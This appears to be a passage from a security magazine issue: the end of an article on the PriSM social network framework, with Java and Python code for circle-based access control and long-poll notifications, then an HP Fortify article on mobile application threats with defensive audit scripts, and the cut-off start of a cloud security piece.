If the user does not, then she/he is granted access to the message if there exists a succession of circles C1, C2, ..., CN such that the user satisfies the policy of each circle, she/he is a member of CN, C1 is a circle in the tag set and each circle in the succession is a child of the next according to the circles' hierarchy. See Figure 4 for a visual example.

Figure 4. Circle's succession within a hierarchy

The conflict set works the opposite way: if a user is a member of any circle in the conflict set then she/he is denied access to the message. For circles in the conflict set we require only a direct membership. That is, if a user is a member of the parent (or the child) of a circle in the conflict set, but not of a circle in the conflict set itself, then she/he is not denied access to the message a priori.

As an example, consider the toy scenario shown in Figure 5. The users Bob, Charlie and Ellen are Alice's fans. Alice is a member of the circle C1, which is in turn an inner circle of C2. Suppose Alice creates a message m, tags it with C1 and defines no circle in the conflict set. As previously explained, Bob is allowed to access m because he is a member of C1. The other users, on the other hand, will have to satisfy the policies of C1 to access m. Supposing that both Charlie and Ellen satisfy such policies, only Charlie will access m, because he is a member of C2. Hence, Ellen will be required to satisfy also the policies of C2 before being able to read content from the circle C2.

The primary objective of the PriSM system is to 
allow users to exchange information. In order to 
provide to the users with satisfying experience, the 
architecture of PriSM has been designed to reduce 
the time elapsing between when the information is 
created and when it is actually available to the final 
user. To reduce such latency, PriSM takes advan- 
tage of a push mechanism that sends the messag- 
es created by the users of an ASN to all the ASNs 
of the fans of such users. We recall that we define 
that Alice is a fan of Bob if she is interested in the 
messages created by him. 

Figure 6 shows the steps required to post a mes- 
sage through the system to all the users potentially 




interested in it. First of all, the user sends the mes- 
sage m to the Content Manager (1), which stores 
the message in the local database. 

Afterwards, the Content Manager retrieves the set of followers from the User Manager (2). The Content Manager then asks the Access Control Manager, for each local follower, whether that user is allowed to access the message (3).

The verification is performed by the Access Control Manager according to the tag set, the conflict set, the set of circles the designated user is a member of and the list of propagation policies. Such information is retrieved by the Access Control Manager by querying the Circle Manager (4). If the verification (3) holds then the Content Manager will notify the destination user: immediately if the user is currently on-line, or by delivering the message to the user's inbox, to be retrieved as soon as she/he logs into the system (9). At the same time, the Content Manager sends the set of remote followers to the Remote Interface (6) which will, in turn, extract the set of domains to be notified of the existence of m (6).

The action of notifying the remote domains actu- 
ally consists in forwarding m. Therefore, each re- 
mote domain will send the message m to the local 
Content Manager (8) which, in turn, will perform 
the steps (2) to (4), as performed by the Content 
Manager of the original domain, including the final 
notification (9) to the local users. 

We assume each domain to be trusted. This means that the Access Control Manager will behave consistently across all ASNs. Moreover, we assume that circles' data and messages will be replicated among different domains, mainly to reduce the latency of the system. Note that such assumptions do not introduce any vulnerability substantially different from those of other existing modes of electronic communication such as email (Figure 6).
Figure 6. Message propagation

Listing 4a. Frontier-based information flow mechanism: the code (continued in Listing 4b)

    @Override
    public boolean isContentViewable(UserData user, UserCircle userCircle, Content post)
            throws RemoteDomainNotConnectedException {
        List<CircleID> allCircles = userCircle.getAllCircles();

        // check if denied: direct membership in a circle of the conflict set
        for (CircleID dtag : post.getDeniedTags()) {
            if (allCircles.contains(dtag)) {
                logger.info(user.getId() + " is member of a denied circle");
                return false;
            }
        }

        // for each tagged circle, look for an ascending path the reader may cross
        for (CircleID tag : post.getTags()) {
            CircleID analyzedCircle = tag;
            do {
                // check if outside or contained
                if (null == analyzedCircle || allCircles.contains(analyzedCircle)) {
                    return true;
                }

                Action action = ServerConfig.getDefaultAction();

                // retrieve rule
                try {
                    List<Rule> circleRules = circleManager.getCircleRules(analyzedCircle);

                    // find the most specific rule
                    int maxMatching = 0;
                    for (Rule rule : circleRules) {
                        if (maxMatching < rule.size()) {
                            int i = rule.check(user, userCircle, post);
                            if (i > maxMatching) {
                                maxMatching = i;
                                action = rule.getAction();
                            }
                        }
                    }
                } catch (CircleNotExistingException e) {
                    logger.warn("Circle " + analyzedCircle + " was not found!");
                    break;
                } catch (DataSourceException e) {
                    logger.error("DataSourceException", e);
                    break;
                }

                // if can cross the border
                if (action.equals(Action.ALLOW)) {
Step (8) is executed using interfaces similar to the ones shown in Listing 1 (for the client side, which is sending the message) and Listing 2 (for the server side, which is receiving the message).

The source code executing step (3) in the Access Control Manager is shown in Listing 4. As one may notice, at first we verify that the user is not a member of one of the denied circles and then we evaluate, for each tagged circle, whether there is at least one path from that circle to the outside allowing the reading user to access the message.

The code presented in Listing 4 is not optimal. We present this version of the code for the sake of simplicity. In order to optimize the operation executed by the method isContentViewable() we could use different threads to parallelize the computation of the path ascending from each tagged circle. Moreover, it is possible to further speed up the computation of such paths by means of a shared list of visited paths, to stop the computation of a path if one of its steps has already been evaluated by another thread (Listing 4).
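The frontier-based check of Listing 4 and of the description above, as an added illustration in Python (not PriSM's Java code). It encodes the toy scenario of Figure 5 plus a few extra readers, and treats crossing the outermost circle as reaching "the outside" mentioned above; the shape of rules and predicates, the selection of the most specific rule by number of satisfied predicates and the default action (deny) are assumptions made for this example.

```python
# Added illustration (not PriSM's code): conflict set checked by direct
# membership, then an ascending walk from each tagged circle, applying the
# most specific matching rule at every border.
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Set


@dataclass
class User:
    name: str
    circles: Set[str]                      # circles the user is a direct member of
    attrs: Dict[str, str] = field(default_factory=dict)


@dataclass
class Message:
    author: str
    tags: Set[str]                         # tag set
    conflict: Set[str] = field(default_factory=set)   # conflict set


Predicate = Callable[[User, Message], bool]


@dataclass
class Rule:
    predicates: List[Predicate]            # Pred1 & Pred2 & ... (a conjunction)
    allow: bool

    def matched(self, user: User, msg: Message) -> int:
        """Number of predicates when all of them hold, 0 otherwise
        (assumed semantics of rule.check() in the listing)."""
        return len(self.predicates) if all(p(user, msg) for p in self.predicates) else 0


@dataclass
class Circle:
    parent: Optional[str]                  # None for an outermost circle
    rules: List[Rule] = field(default_factory=list)


DEFAULT_ALLOW = False                      # stands in for ServerConfig.getDefaultAction()


def border_action(circle: Circle, user: User, msg: Message) -> bool:
    """The most specific matching rule (most predicates) decides; default otherwise."""
    best, action = 0, DEFAULT_ALLOW
    for rule in circle.rules:
        if len(rule.predicates) <= best:
            continue                       # cannot beat the rule already chosen
        m = rule.matched(user, msg)
        if m > best:
            best, action = m, rule.allow
    return action


def is_content_viewable(user: User, msg: Message, circles: Dict[str, Circle]) -> bool:
    if user.circles & msg.conflict:        # conflict set: direct membership only
        return False
    for tag in msg.tags:                   # look for a path C1, ..., CN from some tag
        current: Optional[str] = tag
        while current is not None:
            if current in user.circles:    # the reader is a member of CN
                return True
            circle = circles.get(current)
            if circle is None or not border_action(circle, user, msg):
                break                      # unknown circle or closed border: next tag
            if circle.parent is None:
                return True                # crossed the outermost circle
            current = circle.parent
    return False


def figure5_scenario() -> Dict[str, bool]:
    """Constructed data: Alice posts m tagged C1; C1 is an inner circle of C2."""
    fans = {"bob": {"alice"}, "charlie": {"alice"}, "ellen": {"alice"}, "frank": {"alice"}}
    is_fan: Predicate = lambda u, m: m.author in fans.get(u.name, set())
    in_cs: Predicate = lambda u, m: u.attrs.get("dept") == "cs"
    intern: Predicate = lambda u, m: u.attrs.get("rank") == "intern"
    circles = {
        "C1": Circle(parent="C2", rules=[Rule([is_fan], allow=True)]),
        "C2": Circle(parent=None, rules=[Rule([in_cs], allow=True),
                                         Rule([in_cs, intern], allow=False)]),
        "C3": Circle(parent=None),
    }
    m = Message(author="alice", tags={"C1"})
    m_conflict = Message(author="alice", tags={"C1"}, conflict={"C3"})
    users = {
        "bob": User("bob", {"C1"}),                                      # member of C1
        "charlie": User("charlie", {"C2"}),                              # member of C2
        "ellen": User("ellen", set(), {"dept": "cs"}),                   # must pass C1 and C2
        "ellen_math": User("ellen", set(), {"dept": "math"}),            # fails C2's policy
        "dave": User("dave", {"C2"}),                                    # not a fan: C1 is closed
        "frank": User("frank", set(), {"dept": "cs", "rank": "intern"}),  # more specific deny wins
    }
    results = {name: is_content_viewable(u, m, circles) for name, u in users.items()}
    results["bob_in_conflict"] = is_content_viewable(User("bob", {"C1", "C3"}), m_conflict, circles)
    return results
```

Two details worth noticing: dave is a member of C2, the parent of the tagged circle, yet is refused because the path has to start at C1 and he cannot cross its border; and frank satisfies C2's general allow rule but is refused by the two-predicate deny rule, which is what "most specific rule" buys over a first-match evaluation.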

Notification System 

The promptness of a system is a crucial feature to provide a satisfying user experience. This means both that the website responds to the commands issued by the user and that the interface updates itself according to the events generated by other users.

HTML5 provides an interesting feature called WebSocket which allows the server to send unsolicited data to the client. Unfortunately, this feature is not currently supported by all the major browsers and therefore we needed to use another approach to make PriSM's interface more responsive to the modifications of the system.

We chose to implement a personalized version of the so-called HTTP Push. HTTP Push is a technique allowing a server to emulate pushing data to the client using a pull request which blocks on the server side (Figure 7).



Figure 7. HTTP Pull vs HTTP Push (diagram: Client/Server timelines with GET, Wait, {data} and PUSH exchanges)
Listing 4b. Frontier-based information flow mechanism: the code (continued from Listing 4a)

                    try {
                        // get the parent: the border was open, climb one level
                        CircleData circleData = circleManager.getCircleById(analyzedCircle);
                        analyzedCircle = circleData.getParent();
                    } catch (DataSourceException e) {
                        logger.error("Reading details for " + analyzedCircle);
                        break;
                    } catch (CircleNotExistingException e) {
                        logger.warn("Circle " + analyzedCircle + " was not found!");
                        break;
                    }
                } else {
                    // else try with the next tagged circle
                    break;
                }
            } while (null != analyzedCircle);
        }

        return false;
    }
Listing 5. The client-side code for retrieving new notifications

    private void getNewNotification() {
        clientFactory.getDataProvider().getNewNotification(
                new AsyncCallback<Map<NotificationType, List<? extends ID>>>() {

            @Override
            public void onSuccess(Map<NotificationType, List<? extends ID>> result) {
                int tot = 0;

                if (result.keySet().contains(NotificationType.UPDATE_ROLE)) {
                    /* ... update the privileges ... */
                }

                if (result.keySet().contains(NotificationType.CONTENT_CREATED)
                        || result.keySet().contains(NotificationType.CONTENT_SELF_CREATED))
                    clientFactory.getEventBus().fireEvent(new NewContentEvent());

                if (result.keySet().contains(NotificationType.CONTENT_COMMENTED)
                        || result.keySet().contains(NotificationType.CONTENT_SELF_COMMENTED))
                    clientFactory.getEventBus().fireEvent(new NewCommentEvent());

                // sum up except self created content
                for (NotificationType type : result.keySet()) {
                    if (!type.equals(NotificationType.CONTENT_SELF_CREATED)
                            && !type.equals(NotificationType.CONTENT_SELF_COMMENTED)) {
                        tot += result.get(type).size();
                    }
                }

                if (tot > 0)
                    view.getNotificationLinkText().setText("Notification [" + tot + "]");
                else
                    view.getNotificationLinkText().setText("Notification");

                // issue the next request right away: the server holds it until a
                // notification arrives or its waiting time expires
                getNewNotification();
            }

            @Override
            public void onFailure(Throwable caught) {
                /* handle a failure properly */
            }
        });
    }

Listing 6. The server-side code for retrieving new notifications

    public class DataProviderImpl implements DataProvider {

        private NotificationList notifications;

        @Override
        public Map<NotificationType, List<? extends ID>> getNewNotification(String username)
                throws DataSourceException {
            // blocks until a notification for username is created or the wait expires
            notifications.get(username);
            return dataSource.getNewNotification(username);
        }
    }
Listing 7. NotificationLists, the class managing the push simulation

    public class NotificationLists {

        private Map<String, NotificationSync> notificationListener;
        private static final long TIME = 30000;

        public NotificationLists() {
            notificationListener = new HashMap<String, NotificationSync>();
        }

        public void get(String username) {
            NotificationSync c = null;
            synchronized (notificationListener) {
                c = notificationListener.get(username);
                if (null == c) {
                    c = new NotificationSync();
                    notificationListener.put(username, c);
                }
            }
            synchronized (c) {
                // block the request thread unless something is already pending
                if (!c.get())
                    try {
                        c.wait(TIME);
                    } catch (InterruptedException e) {
                        // something interrupted this thread. Just live with it.
                    }
                c.clean();
            }
        }

        public void add(String username) {
            NotificationSync c = null;
            synchronized (notificationListener) {
                c = notificationListener.get(username);
                if (null == c)
                    return; // nobody is waiting for this user
            }
            synchronized (c) {
                c.add();
                c.notified();
                c.notifyAll(); // wake the request thread blocked in get()
            }
        }
    }
PriSM's web-interface executes a sort of background thread that queries the server for new notifications. We define as a notification each event that modifies the state of the server and is of some relevance for the user. Examples of notifications are new messages, modifications of the membership status of some circle and updates to the privileges of a role.

Listing 5 shows the client-side code handling the requests. We remind the reader that the presented code is written in Java but is compiled to JavaScript by the GWT compiler. One may notice that the method getNewNotification() queries the server repeatedly, calling the method clientFactory.getDataProvider().getNewNotification() without even waiting between the requests.

This is possible because the method actually executing the remote request will not return immediately. Listings 6 and 7 show how we made this possible.

Listing 6 shows the server-side code that is executed upon the call of clientFactory.getDataProvider().getNewNotification() on the client.

Such a method is called getNewNotification() and its body is very simple. First of all it calls the get() method of the class NotificationList and then retrieves the new notifications, if any, from the data source.

Listing 7, on the other hand, shows the class NotificationList. It consists of a Map which is used to coordinate the notification system.

When the get() method is invoked the NotificationList retrieves the NotificationSync associated with the user, or creates it if it does not exist. After that, the method get() of the NotificationSync object is invoked. Such method will then put the thread executing the request (on the server) on wait for up to 30 seconds. Thus, the get() method will not return unless another thread wakes up its thread or 30 seconds are over.

The thread can be woken up by means of a call to the method add() of the NotificationList object, which is called every time a new notification for the user is created.

The average timeout for an HTTP connection is 
around 60 seconds but we chose a shorter waiting 
time to reduce the probability of connection errors 
due to communication and/or server delays. 
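The blocking get()/add() pair of Listings 6 and 7, as an added illustration with Python threads (not PriSM's Java code). Class and method names mirror the listings; their internals, the registered() helper and the shortened timeouts used by simulate() are assumptions made for the demonstration.

```python
# Added illustration (not PriSM's code): a request thread blocks on the user's
# NotificationSync until another thread adds a notification or the wait expires.
import threading
import time
from typing import Dict


class NotificationSync:
    """Per-user pending-notification counter guarded by a condition variable."""

    def __init__(self) -> None:
        self.cond = threading.Condition()
        self.pending = 0

    def add(self) -> None:
        with self.cond:
            self.pending += 1
            self.cond.notify_all()        # wake the request thread blocked in get()

    def get(self, timeout: float) -> int:
        """Block for up to `timeout` seconds unless something is already pending;
        return and clear the pending count (the clean() step of Listing 7)."""
        with self.cond:
            if self.pending == 0:
                self.cond.wait(timeout)   # returns early when notified
            n, self.pending = self.pending, 0
            return n


class NotificationLists:
    def __init__(self, timeout: float = 30.0) -> None:
        self.timeout = timeout            # PriSM waits 30 s, below the ~60 s HTTP timeout
        self._lock = threading.Lock()
        self._per_user: Dict[str, NotificationSync] = {}

    def get(self, username: str) -> int:
        """Server side of getNewNotification(): returns when a notification
        arrives or the wait expires, so the client can re-issue the request at once."""
        with self._lock:
            sync = self._per_user.get(username)
            if sync is None:
                sync = self._per_user[username] = NotificationSync()
        return sync.get(self.timeout)

    def add(self, username: str) -> None:
        """Called whenever a new notification for `username` is created."""
        with self._lock:
            sync = self._per_user.get(username)
        if sync is not None:              # as in Listing 7: nobody polling, nothing to wake
            sync.add()

    def registered(self, username: str) -> bool:
        with self._lock:
            return username in self._per_user


def simulate(timeout: float = 0.5) -> Dict[str, float]:
    """One request woken early by an event, and one that simply times out."""
    lists = NotificationLists(timeout)
    out: Dict[str, float] = {}

    def request_thread() -> None:
        t0 = time.monotonic()
        out["woken"] = lists.get("alice")
        out["woken_after"] = time.monotonic() - t0

    t = threading.Thread(target=request_thread)
    t.start()
    while not lists.registered("alice"):  # let the request reach the server first
        time.sleep(0.01)
    time.sleep(0.05)
    lists.add("alice")                    # a new message for alice arrives
    t.join()

    t0 = time.monotonic()
    out["timed_out"] = lists.get("bob")   # nothing arrives: returns after `timeout`
    out["timed_out_after"] = time.monotonic() - t0
    return out
```

The pending counter is what makes the scheme safe against a lost wake-up: if add() runs after the entry is registered but before the request thread reaches wait(), get() sees a non-zero count and returns without blocking, instead of sleeping for the full timeout.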

Conclusion 

In this article, we presented PriSM, a framework for creating social meshes among autonomous social networks which can be deployed and customized according to the needs of individual organizations. We presented some of its features, accompanied by snippets of the actual code used to realize them. While PriSM has been designed to cater primarily for organizational usage, its core components can also be utilized in order to realize a decentralized peer-to-peer online social networking platform [10].
Mobile Applications

Are you Prepared to Carry the Risk? 

Addressing Today's Top Three Mobile Application Threats 

There is no question that mobile computing is growing at 
an exponential rate. This rapid transformation has caused 
security concerns to be outpaced by the ease of use, flexibility, 
and productivity of mobile devices. When vulnerabilities are 
exploited, the security of mission-critical data becomes a serious 
threat. 



Gain insight into the top three mobile ap- 
plication security threats facing organiza- 
tions today and receive recommendations 
for mitigating associated risk. 

Background 

According to Morgan Stanley research, by the end 
of 2012, more smartphone units will be sold than 
desktops and laptops combined ("Ten Questions 
Internet Execs Should Ask & Answer"; Morgan 
Stanley Technology Research Presentation by An- 
alyst Mary Meeker; Web 2.0 Summit, San Francis- 
co, CA; Nov. 16, 2010). It has been a remarkable 
and rapid transformation that, much like the advent 
of the web, has left security concerns outpaced by 
the ease of use and flexibility of a new tool. 

Therefore, the HP Fortify on Demand Manual 
Testing Team analyzed security threats associated 
with a number of mobile applications to identify the 
most common vulnerabilities. 



You'll learn 

• Mobile applications are just as prone to security 
vulnerabilities as their web counterparts. 

• Insecure use of mobile APIs, data exposure in transit and at rest, and other serious threats make this shift to mobile computing a top concern for businesses today.

• The top three mobile application security threats 
observed in a sample set. 

• Recommendations on how to mitigate the risk of 
security vulnerabilities in mobile computing. 



The HP Team found that applications on mobile devices are just as prone to security vulnerabilities as their web counterparts. There were numerous instances of insecure use of mobile APIs, data exposure in transit and at rest, and other serious threats. This analysis outlines the top three security concerns discovered in the survey sample set, along with recommendations as to how organizations can mitigate the associated risk.

Sensitive Data Leakage Over Insecure 
Channels 

The HP Team analysis discovered that more than 
half of applications tested (51%) were susceptible 
to information leakage vulnerabilities. A user's per- 
sonal data was often sent over unencrypted net- 
work protocols such as HTTP. Much of this infor- 
mation was basic, such as names, addresses, and 
phone numbers; however, it also included the cur- 
rent location of the user and the specific device 
identifier (aka the UDID). If an attacker were able 
to obtain all of this information, they would be able 
to physically locate a 'target' in the real world. The 
potential implications of this can be staggering. 

Less dramatic, but equally concerning would be 
a situation involving application exploitation: if the 
application has been sending the UDID, full name, 
address, etc., to a vulnerable web service, and that 
web service was susceptible to SQL Injection, then 
every bit of data on that mobile device could be ac- 
cessed. 
Data transmitted over insecure channels is not 
limited to personal data - application data is al- 
so susceptible. The team found that login infor- 
mation, user credentials, session IDs, tokens, 
and sensitive company data were all being sent 
over unencrypted network protocols like HTTP. 
The consequences for a vulnerable banking ap- 
plication could be devastating. If credentials, ses- 
sion identifiers, personally identifiable information, 
or other sensitive data are being transmitted to a 
backend server, the transmission must be secure. 
Otherwise, data could be intercepted by an attack- 
er using common network packet capturing tools 
or applications (e.g. DroidSheep). 

The analysis also revealed that as much as 75% 
of the applications tested were capable of sending 
tracking data to third party advertising and analyt- 
ics providers. While not technically a vulnerabili- 
ty, this does offer more attack vectors for a poten- 
tial attacker if those providers are themselves not 
secure, or are sending the data over an insecure 
connection. Mobile application developers should 
consider the security of everything their applica- 
tions can communicate with, not just their own ap- 
plications. This extends to every third party service 
or library they used to build applications. 
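The two findings above, cleartext transmission of sensitive fields and disclosure to third-party hosts, are the kind of thing an assessor checks by running the application through an intercepting proxy and reviewing what each request carries. The following Python script is an added example (not code from the article or from the HP team) that performs that review over a handful of constructed proxy-log entries: it flags requests that send credentials, session identifiers, the device identifier or location over plain HTTP, and separately flags sensitive fields going to hosts outside an assumed first-party list. The log layout, the hostnames and the list of sensitive field names are assumptions made for the example.

```python
"""Flag sensitive fields sent over cleartext HTTP or to third-party hosts.

Added example: the log format, hostnames and field names below are
constructed for illustration and are not from the article or the HP analysis.
"""
import json
from urllib.parse import parse_qs, urlsplit

# Parameter, cookie and header names treated as sensitive (assumed list).
SENSITIVE_KEYS = {
    "password", "passwd", "pwd", "session", "sessionid", "token", "auth",
    "udid", "deviceid", "email", "phone", "lat", "lon", "address",
    "authorization", "cookie",
}

# Hosts the application is expected to talk to (assumed first-party set).
FIRST_PARTY = {"api.example-bank.test"}

# Constructed proxy-log entries, one per captured request (not real traffic).
SAMPLE_LOG = [
    {"method": "POST", "url": "http://api.example-bank.test/login",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "username=alice&password=hunter2&udid=0123456789abcdef"},
    {"method": "GET", "url": "https://api.example-bank.test/accounts",
     "headers": {"Cookie": "sessionid=abc123"}, "body": ""},
    {"method": "GET",
     "url": "http://tracker.adnet.test/ping?udid=0123456789abcdef&lat=47.60&lon=-122.33",
     "headers": {}, "body": ""},
    {"method": "POST", "url": "http://api.example-bank.test/profile",
     "headers": {"Content-Type": "application/json", "Authorization": "Bearer t0k3n"},
     "body": json.dumps({"name": "Alice", "address": "1 Main St"})},
]


def _field_names(entry):
    """Yield every query parameter, body field, header and cookie name in one request."""
    parts = urlsplit(entry["url"])
    for name in parse_qs(parts.query, keep_blank_values=True):
        yield name.lower()
    headers = entry.get("headers", {})
    body = entry.get("body") or ""
    if "json" in headers.get("Content-Type", "").lower():
        try:
            data = json.loads(body)
        except ValueError:
            data = {}
        if isinstance(data, dict):
            for name in data:
                yield str(name).lower()
    elif body:
        for name in parse_qs(body, keep_blank_values=True):
            yield name.lower()
    for header in headers:
        yield header.lower()
    for cookie in headers.get("Cookie", "").split(";"):
        name = cookie.split("=", 1)[0].strip().lower()
        if name:
            yield name


def sensitive_fields(entry):
    """Sorted list of the sensitive names found in one request."""
    return sorted({n for n in _field_names(entry) if n in SENSITIVE_KEYS})


def audit(entries, first_party=FIRST_PARTY):
    """Return findings: cleartext transmission and third-party disclosure of sensitive fields."""
    findings = []
    for entry in entries:
        keys = sensitive_fields(entry)
        if not keys:
            continue
        parts = urlsplit(entry["url"])
        host = (parts.hostname or "").lower()
        if parts.scheme.lower() != "https":
            findings.append({"issue": "cleartext", "url": entry["url"], "keys": keys})
        if host not in first_party:
            findings.append({"issue": "third-party", "url": entry["url"], "keys": keys})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print("%-12s %s  fields=%s" % (f["issue"], f["url"], ",".join(f["keys"])))
```

On the constructed log the login request, the tracker ping and the profile update are all reported as cleartext, and the tracker ping is additionally reported as third-party disclosure; the HTTPS request to the first-party host is not reported even though it carries a session cookie, which is the intended distinction.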

Lost / Stolen Devices 

Devices get lost. Devices are stolen. This is not 
new and will certainly continue, but with the prolif- 
eration of mobile computing, the effort that organi- 
zations put into securing vulnerabilities introduced 
by lost or stolen devices has become more front 
and center. 

Encryption on corporate computers is now stan- 
dard protocol for most Fortune 500 companies. 
Ten years ago the news was filled with stories of 
data stolen from lost PCs. This has definitely re- 
duced, in part because of legislative requirements, 
but also because corporations have learned their 
lessons the hard way. However, these same stan- 
dards are not applied to mobile devices, and in the 
age of Bring Your Own Device (BYOD) to work, 
this is still a critical problem that needs attention. 

Mobile applications present unique areas of risk 
when a device they are running on is lost or sto- 
len. 68% of the applications tested in this analysis 
did not secure the data stored on the device. As a 
result, attackers were able to obtain elevated privi- 
leges on a stolen device to access sensitive appli- 
cation data. 

A method to reduce the risk is to ensure that all 
credentials stored on a mobile device be either en- 
crypted on Android or stored to the Keychain on 
iOS. Application sandboxing (limiting the resourc- 
es the application can access) and code sign- 
ing (putting restrictions in place to guarantee the 
code has not been altered) can help mitigate this 
in most scenarios as well. However, these can be 
bypassed by common device rooting (gaining priv- 
ileged control) and jail-breaking techniques, giving 
the attacker total access to the entire file system of 
the device. 

Malicious Applications 

In addition to protecting mobile applications from 
outside agents, mobile applications must also now 
be protected from other applications stored on the 
same device. Nearly a quarter (24%) of the appli- 
cations the team tested logged or stored sensitive 
data on the device that was readable by other non- 
privileged applications on the device. 

Ten percent of the applications tested allowed 
attacks via inter-application communication or via 
weak permissions. Malicious applications can typi- 
cally only access another application's data if the 
data was stored world-readable (e.g. SD card) or if 
the application logged any sensitive data. If a mali- 
cious application is able to load code that can el- 
evate privileges, it may be able to completely com- 
promise another application's data. 

Inter-application communication can occur on 
most operating systems. 

For Android, developers should use the principle 
of least privilege and only define necessary per- 
missions in AndroidManifest.xml for the applica- 
tion to function properly. Caution should be exer- 
cised when sending implicit Intents and exporting 
components. Explicit Intents should be used when 
possible. Exporting components should be avoid- 
ed unless absolutely necessary. Furthermore, sen- 
sitive data should never be allowed to be written to 
world-readable/writable files or stored to the SD- 
Card. 
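The manifest side of this guidance can be checked mechanically during the static analysis the article recommends. The Python script below is an added example (not code from the article or from HP) that parses a constructed AndroidManifest.xml and reports two things: requested permissions that fall in an assumed review list, and components reachable from other applications without an android:permission guard. A component with an intent-filter is treated as exported unless android:exported="false" is set, a content provider with no android:exported attribute is treated as exported (the older platform default), and the launcher activity is exempted because it has to be exported. The package name, component names and review list are assumptions made for the example.

```python
"""Static check of an AndroidManifest.xml for over-broad permissions and
components exposed to other applications.

Added example: the manifest text, package and component names are
constructed for illustration and are not from the article or the HP analysis.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Assumed review list: permissions that need a written justification.
REVIEW_PERMISSIONS = {
    "android.permission.READ_CONTACTS",
    "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_SMS",
}
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed manifest (not a real application).
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.bankapp">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".TransferActivity">
      <intent-filter>
        <action android:name="com.example.bankapp.TRANSFER"/>
      </intent-filter>
    </activity>
    <provider android:name=".AccountProvider"
              android:authorities="com.example.bankapp.accounts"
              android:exported="true"/>
    <service android:name=".SyncService" android:exported="false"/>
    <receiver android:name=".PushReceiver" android:exported="true"
              android:permission="com.example.bankapp.permission.PUSH"/>
  </application>
</manifest>
"""


def _a(attr):
    """Clark-notation name for an attribute in the android: namespace."""
    return "{%s}%s" % (ANDROID_NS, attr)


def is_exported(component):
    """True when other applications can reach the component.

    An explicit android:exported wins; otherwise an intent-filter makes an
    activity, service or receiver exported, and a provider without the
    attribute is treated as exported (the older platform default).
    """
    explicit = component.get(_a("exported"))
    if explicit is not None:
        return explicit.strip().lower() == "true"
    if component.tag == "provider":
        return True
    return component.find("intent-filter") is not None


def is_launcher(component):
    """The launcher activity must be exported, so it is not reported."""
    for flt in component.findall("intent-filter"):
        for cat in flt.findall("category"):
            if cat.get(_a("name")) == "android.intent.category.LAUNCHER":
                return True
    return False


def has_permission_guard(component):
    """True if callers must hold a permission to use the component."""
    return any(component.get(_a(g)) for g in ("permission", "readPermission", "writePermission"))


def audit_manifest(xml_text, review=REVIEW_PERMISSIONS):
    """Return permissions to review and exported components lacking a permission guard."""
    root = ET.fromstring(xml_text)
    requested = [u.get(_a("name")) for u in root.findall("uses-permission")]
    flagged = sorted(p for p in requested if p in review)
    exposed = []
    app = root.find("application")
    if app is not None:
        for tag in COMPONENT_TAGS:
            for comp in app.findall(tag):
                if is_exported(comp) and not has_permission_guard(comp) and not is_launcher(comp):
                    exposed.append((tag, comp.get(_a("name"))))
    return {"permissions": flagged, "exported_unguarded": exposed}


if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    for perm in report["permissions"]:
        print("review permission:", perm)
    for tag, name in report["exported_unguarded"]:
        print("exported without permission guard:", tag, name)
```

On the constructed manifest the check reports READ_CONTACTS and WRITE_EXTERNAL_STORAGE for review, and flags TransferActivity (exported implicitly by its intent-filter) and AccountProvider (exported explicitly, no read or write permission). SyncService is not exported and PushReceiver is exported behind a permission, so neither is reported. World-readable files and SD card writes are not visible in the manifest; those need a code review or a look at the file modes on a test device.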

For iOS, developers should validate the source 
bundle identifier to the open URL method when im- 
plementing custom protocol handlers. All sensitive 
logging calls should be disabled for applications in 
production. 

Recommendations 

There are certain actions that organizations can 
take to mitigate the risk of mobile application se- 
curity vulnerabilities. First, applications need to be 
manually audited and assessed before products 
are launched. This allows organizations to deter- 
mine if any input injection vulnerabilities or infor- 
mation leakage vulnerabilities are present. The 
code should be analyzed via static analysis when 
being developed to find code-based vulnerabilities. 
As with any application, it is much more cost effec- 
tive to address security vulnerabilities during de- 
velopment rather than after it has been released. 

Secure data transmission standards should be 
included as part of any application's requirements, 
especially if an application is being developed by a 
third-party. The same goes for secure data storage 
and application logging. Reasonable inter-applica- 
tion communication exposure and permissions in 
application requirements should be stringently de- 
fined. These concerns should all be addressed in 
the requirements phase and tested during devel- 
opment. 

Lastly, when performing security testing and 
analysis on mobile applications, the server-side 
web services and APIs that the mobile clients talk 
to should be taken in context and analyzed for vul- 
nerabilities. High-risk vulnerabilities may be missed 
if the two are tested out of context with each other. 



MARK PAINTER 

Mark Painter has been in the security industry since 
2002, when he joined SPI Dynamics. During his ten- 
ure, he has focused on vulnerability research, product 
management, and social media. Painter is currently the 
Product Marketing Manager for the HP Fortify Webln- 
spect product suite as well as HP Fortify on Demand pro- 
fessional services. 
How Has the Real 
Cloud Evolved? 

A Peek Inside the "Cloud" 

The anticipated revenue for "Cloud Computing" is $55 billion by 
2014, according to technology research firm IDC. 
Yes... We in InfoSec hear it all the time... 



The common response to the "There is no such 
thing as a secure cloud that you do not host 
yourself" statement is... 

"You security people are all just paranoid!" 

But let's look at the facts: 

• Apple iCloud Breached August 2012 

• Epsilon April 2011 (with customer data from Abe 
Books and American Express possibly stolen). 

• Microsoft Cloud Data Breach December 2010 

• Dropbox Breach in July 2012 

As far as public cloud offerings it is a matter of 
"when" and not "if," a breach will occur and how 
much will be lost. Wikipedia defines the "Cloud" as: 

Cloud computing is the use of computing resourc- 
es (hardware and software) that are delivered as 
a service over a network (typically the Internet). 
The name comes from the use of a cloud-shaped 
symbol as an abstraction for the complex infra- 
structure it contains in system diagrams. Cloud 
computing entrusts remote services with a user's 
data, software and computation. 

I deeply suspected this since the concept of the 
"Cloud" became a viable offering, but, the last cou- 
ple of years have allowed me to see specific vul- 
nerabilities in the real world and also gain some 
